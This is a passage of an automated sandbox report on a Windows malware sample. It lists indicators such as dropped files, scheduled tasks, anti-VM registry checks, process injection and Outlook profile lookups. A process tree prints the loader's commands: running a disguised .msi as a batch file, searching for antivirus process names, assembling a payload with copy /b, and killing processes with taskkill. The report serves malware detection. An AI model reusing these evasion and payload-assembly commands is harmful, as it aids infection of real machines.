behavioral2/memory/2832-7347-0x00007FFD0C430000-0x00007FFD0C449000-memory.dmp	upx
behavioral2/memory/2832-7348-0x00007FFD0C400000-0x00007FFD0C42B000-memory.dmp	upx
behavioral2/memory/2832-7413-0x00007FFD0C3F0000-0x00007FFD0C3FF000-memory.dmp	upx
behavioral2/memory/2832-7412-0x00007FFD0C400000-0x00007FFD0C42B000-memory.dmp	upx
behavioral2/memory/2832-7411-0x00007FFD0C430000-0x00007FFD0C449000-memory.dmp	upx
behavioral2/memory/2832-7410-0x00007FFD0C580000-0x00007FFD0C58F000-memory.dmp	upx
behavioral2/memory/2832-7408-0x00007FFCF6E90000-0x00007FFCF74F4000-memory.dmp	upx
behavioral2/memory/2832-7409-0x00007FFD0C450000-0x00007FFD0C477000-memory.dmp	upx

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\CombatTongue	ReK7Ewx.exe
File opened for modification	C:\Windows\PracticeRoot	ReK7Ewx.exe
File created	C:\Windows\Tasks\Gxtuum.job	zY9sqWs.exe
File opened for modification	C:\Windows\GovernmentsHighly	ADFoyxP.exe
File opened for modification	C:\Windows\HighKerry	ADFoyxP.exe
File opened for modification	C:\Windows\PracticalPrevent	ADFoyxP.exe
File opened for modification	C:\Windows\UpdatedMakeup	ADFoyxP.exe
File opened for modification	C:\Windows\PlatesRegister	ReK7Ewx.exe
File created	C:\Windows\Tasks\rapes.job	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
File opened for modification	C:\Windows\PlatesRegister	ReK7Ewx.exe
File opened for modification	C:\Windows\PerfectlyFda	ADFoyxP.exe
File opened for modification	C:\Windows\PracticeRoot	ReK7Ewx.exe
File opened for modification	C:\Windows\AccreditationShed	ADFoyxP.exe
File opened for modification	C:\Windows\FilenameWho	ADFoyxP.exe
File opened for modification	C:\Windows\CombatTongue	ReK7Ewx.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0008000000023d30-7215.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
4624	1896	WerFault.exe	95
5744	5152	WerFault.exe	149
5408	5784	WerFault.exe	155
6188	2044	WerFault.exe	197

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9S3WM9XDGZ4D8BWQTGUTTQAKK.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f953d9af5b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PfOHmro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yUI6F6C.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReK7Ewx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	expand.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PfOHmro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReK7Ewx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PfOHmro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	V0Bt74c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gyfhvf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	f953d9af5b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mIrI3a9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	f953d9af5b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Occupation.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADFoyxP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	afe14a332c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Seat.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	V0Bt74c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	expand.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	57c0971734.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mAtJWNv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
6192	timeout.exe
9104	timeout.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 6 IoCs

defense_evasion

pid	Process
6840	taskkill.exe
4092	taskkill.exe
2788	taskkill.exe
8272	taskkill.exe
7068	taskkill.exe
6184	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6884	schtasks.exe
4160	schtasks.exe
8400	schtasks.exe
224	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4652	Gyfhvf.exe
6288	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4464	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
4464	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
3220	rapes.exe
3220	rapes.exe
2264	PfOHmro.exe
2264	PfOHmro.exe
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2264	PfOHmro.exe
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2876	mIrI3a9.exe
2876	mIrI3a9.exe
808	powershell.exe
808	powershell.exe
808	powershell.exe
644	FvbuInU.exe
644	FvbuInU.exe
2528	rapes.exe
2528	rapes.exe
644	FvbuInU.exe
644	FvbuInU.exe
644	FvbuInU.exe
644	FvbuInU.exe
3472	v6Oqdnc.exe
3472	v6Oqdnc.exe
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
6288	explorer.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
5240	SplashWin.exe
7124	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeDebugPrivilege	2264	PfOHmro.exe
Token: SeDebugPrivilege	224	tasklist.exe
Token: SeDebugPrivilege	3680	tasklist.exe
Token: SeDebugPrivilege	2876	mIrI3a9.exe
Token: SeDebugPrivilege	808	powershell.exe
Token: SeDebugPrivilege	4392	a.exe
Token: SeDebugPrivilege	6272	PfOHmro.exe
Token: SeDebugPrivilege	5628	Gyfhvf.exe
Token: SeDebugPrivilege	5804	RegAsm.exe
Token: SeDebugPrivilege	6840	taskkill.exe
Token: SeDebugPrivilege	5464	tasklist.exe
Token: SeDebugPrivilege	7008	tasklist.exe
Token: SeDebugPrivilege	6412	Vhbyv.exe
Token: SeShutdownPrivilege	6688	chrome.exe
Token: SeCreatePagefilePrivilege	6688	chrome.exe
Token: SeShutdownPrivilege	6688	chrome.exe
Token: SeCreatePagefilePrivilege	6688	chrome.exe
Token: SeDebugPrivilege	5628	Gyfhvf.exe
Token: SeDebugPrivilege	4652	Gyfhvf.exe
Token: SeShutdownPrivilege	6688	chrome.exe
Token: SeCreatePagefilePrivilege	6688	chrome.exe
Token: SeShutdownPrivilege	6688	chrome.exe
Token: SeCreatePagefilePrivilege	6688	chrome.exe
Token: SeShutdownPrivilege	6688	chrome.exe
Token: SeCreatePagefilePrivilege	6688	chrome.exe
Token: SeShutdownPrivilege	6688	chrome.exe
Token: SeCreatePagefilePrivilege	6688	chrome.exe
Token: SeDebugPrivilege	5312	tasklist.exe
Token: SeDebugPrivilege	7240	tasklist.exe
Token: SeDebugPrivilege	4092	taskkill.exe
Token: SeDebugPrivilege	3336	aspnet_compiler.exe
Token: SeDebugPrivilege	2788	taskkill.exe
Token: SeDebugPrivilege	8272	taskkill.exe
Token: SeDebugPrivilege	7068	taskkill.exe
Token: SeDebugPrivilege	6184	taskkill.exe
Token: SeDebugPrivilege	6412	Vhbyv.exe
Token: SeDebugPrivilege	7368	firefox.exe
Token: SeDebugPrivilege	7368	firefox.exe
Token: SeDebugPrivilege	5600	57c0971734.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
4072	Seat.com
4072	Seat.com
4072	Seat.com
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
6688	chrome.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
5236	msedge.exe
8036	Occupation.com
8036	Occupation.com
8036	Occupation.com
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe

Suspicious use of SendNotifyMessage 44 IoCs

pid	Process
2636	Occupation.com
2636	Occupation.com
2636	Occupation.com
4072	Seat.com
4072	Seat.com
4072	Seat.com
8036	Occupation.com
8036	Occupation.com
8036	Occupation.com
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
2208	f953d9af5b.exe
2208	f953d9af5b.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe
7368	firefox.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
6020	HmngBpR.exe
6288	explorer.exe
7368	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4464 wrote to memory of 3220	4464	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe	88
PID 4464 wrote to memory of 3220	4464	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe	88
PID 4464 wrote to memory of 3220	4464	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe	88
PID 3220 wrote to memory of 1896	3220	rapes.exe	95
PID 3220 wrote to memory of 1896	3220	rapes.exe	95
PID 3220 wrote to memory of 1896	3220	rapes.exe	95
PID 1896 wrote to memory of 2264	1896	PfOHmro.exe	96
PID 1896 wrote to memory of 2264	1896	PfOHmro.exe	96
PID 1896 wrote to memory of 2264	1896	PfOHmro.exe	96
PID 1896 wrote to memory of 2264	1896	PfOHmro.exe	96
PID 1896 wrote to memory of 2264	1896	PfOHmro.exe	96
PID 1896 wrote to memory of 2264	1896	PfOHmro.exe	96
PID 1896 wrote to memory of 2264	1896	PfOHmro.exe	96
PID 1896 wrote to memory of 2264	1896	PfOHmro.exe	96
PID 3220 wrote to memory of 3108	3220	rapes.exe	103
PID 3220 wrote to memory of 3108	3220	rapes.exe	103
PID 3220 wrote to memory of 3108	3220	rapes.exe	103
PID 3108 wrote to memory of 3164	3108	ReK7Ewx.exe	104
PID 3108 wrote to memory of 3164	3108	ReK7Ewx.exe	104
PID 3108 wrote to memory of 3164	3108	ReK7Ewx.exe	104
PID 3164 wrote to memory of 2812	3164	cmd.exe	106
PID 3164 wrote to memory of 2812	3164	cmd.exe	106
PID 3164 wrote to memory of 2812	3164	cmd.exe	106
PID 3164 wrote to memory of 224	3164	cmd.exe	107
PID 3164 wrote to memory of 224	3164	cmd.exe	107
PID 3164 wrote to memory of 224	3164	cmd.exe	107
PID 3164 wrote to memory of 5060	3164	cmd.exe	108
PID 3164 wrote to memory of 5060	3164	cmd.exe	108
PID 3164 wrote to memory of 5060	3164	cmd.exe	108
PID 3164 wrote to memory of 3680	3164	cmd.exe	109
PID 3164 wrote to memory of 3680	3164	cmd.exe	109
PID 3164 wrote to memory of 3680	3164	cmd.exe	109
PID 3164 wrote to memory of 4888	3164	cmd.exe	110
PID 3164 wrote to memory of 4888	3164	cmd.exe	110
PID 3164 wrote to memory of 4888	3164	cmd.exe	110
PID 3164 wrote to memory of 1020	3164	cmd.exe	111
PID 3164 wrote to memory of 1020	3164	cmd.exe	111
PID 3164 wrote to memory of 1020	3164	cmd.exe	111
PID 3164 wrote to memory of 2384	3164	cmd.exe	112
PID 3164 wrote to memory of 2384	3164	cmd.exe	112
PID 3164 wrote to memory of 2384	3164	cmd.exe	112
PID 3164 wrote to memory of 4688	3164	cmd.exe	113
PID 3164 wrote to memory of 4688	3164	cmd.exe	113
PID 3164 wrote to memory of 4688	3164	cmd.exe	113
PID 3164 wrote to memory of 2648	3164	cmd.exe	114
PID 3164 wrote to memory of 2648	3164	cmd.exe	114
PID 3164 wrote to memory of 2648	3164	cmd.exe	114
PID 3220 wrote to memory of 680	3220	rapes.exe	115
PID 3220 wrote to memory of 680	3220	rapes.exe	115
PID 3220 wrote to memory of 680	3220	rapes.exe	115
PID 680 wrote to memory of 1564	680	cmd.exe	117
PID 680 wrote to memory of 1564	680	cmd.exe	117
PID 680 wrote to memory of 1564	680	cmd.exe	117
PID 680 wrote to memory of 4436	680	cmd.exe	118
PID 680 wrote to memory of 4436	680	cmd.exe	118
PID 680 wrote to memory of 4436	680	cmd.exe	118
PID 3164 wrote to memory of 4072	3164	cmd.exe	120
PID 3164 wrote to memory of 4072	3164	cmd.exe	120
PID 3164 wrote to memory of 4072	3164	cmd.exe	120
PID 3164 wrote to memory of 2636	3164	cmd.exe	121
PID 3164 wrote to memory of 2636	3164	cmd.exe	121
PID 3164 wrote to memory of 2636	3164	cmd.exe	121
PID 3164 wrote to memory of 3780	3164	cmd.exe	122
PID 3164 wrote to memory of 3780	3164	cmd.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3592
- C:\Users\Admin\AppData\Local\Temp\ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
  "C:\Users\Admin\AppData\Local\Temp\ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4464
- - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3220
  - - C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe
      "C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1896
    - - C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"
        5⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2264
      - C:\Users\Admin\AppData\Local\Temp\EdgeBHO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EdgeBHO.exe"
        6⤵
        Executes dropped EXE
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\EdgeBHO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EdgeBHO.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
        8⤵
        
        PID:1736
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "EdgeBHO.exe"
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6840
        
        C:\Users\Admin\EdgeBHO.exe
        
        "EdgeBHO.exe"
        9⤵
        Executes dropped EXE
        
        PID:7064
        
        C:\Users\Admin\EdgeBHO.exe
        
        "EdgeBHO.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2832
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 788
        5⤵
        Program crash
        
        PID:4624
  - - C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe
      "C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3108
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3164
      - C:\Windows\SysWOW64\expand.exe
        
        expand Ae.msi Ae.msi.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2812
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:224
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5060
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3680
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        6⤵
        
        PID:4888
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 789919
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1020
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Deviation.msi
        6⤵
        
        PID:2384
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Brian" Challenges
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4688
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2648
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
        6⤵
        
        PID:4072
      - C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
        
        Occupation.com q
        6⤵
